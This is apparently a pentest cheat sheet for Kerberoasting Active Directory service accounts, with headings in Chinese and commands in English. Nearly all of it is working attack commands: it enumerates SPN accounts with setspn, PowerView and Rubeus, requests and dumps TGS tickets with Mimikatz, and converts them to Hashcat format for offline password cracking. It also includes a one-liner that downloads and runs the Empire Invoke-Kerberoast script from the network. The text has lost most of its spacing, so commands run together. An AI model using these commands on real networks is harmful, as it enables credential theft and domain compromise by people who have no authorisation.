# Get Kerberoastable userssetspn.exe-Q */*#This is a built-in binary. Focus on user accountsGet-NetUser-SPN | select serviceprincipalname #Powerview.\Rubeus.exe kerberoast /stats
技术 1: 请求TGS并从内存中转储
#Get TGS in memory from a single userAdd-Type-AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName"#Example: MSSQLSvc/mgmt.domain.local#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)setspn.exe-T DOMAIN_NAME.LOCAL -Q */*|Select-String'^CN'-Context 0,1|% { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }#List kerberos tickets in memoryklist# Extract them from memoryInvoke-Mimikatz-Command '"kerberos::list /export"'#Export tickets to current folder# Transform kirbi ticket to johnpython2.7 kirbi2john.py sqldev.kirbi# Transform john to hashcatsed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
技术 2: 自动化工具
# Powerview: Get Kerberoast hash of a userRequest-SPNTicket-SPN"<SPN>"-FormatHashcat#Using PowerView Ex: MSSQLSvc/mgmt.domain.local# Powerview: Get all Kerberoast hashesGet-DomainUser*-SPN|Get-DomainSPNTicket-FormatHashcat|Export-Csv.\kerberoast.csv-NoTypeInformation# Rubeus.\Rubeus.exekerberoast/outfile:hashes.kerberoast.\Rubeus.exekerberoast/user:svc_mssql/outfile:hashes.kerberoast#Specific user.\Rubeus.exekerberoast/ldapfilter:'admincount=1'/nowrap#Get of admins# Invoke-Kerberoastiex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")Invoke-Kerberoast-OutputFormathashcat|%{ $_.Hash}|Out-File-EncodingASCIIhashes.kerberoast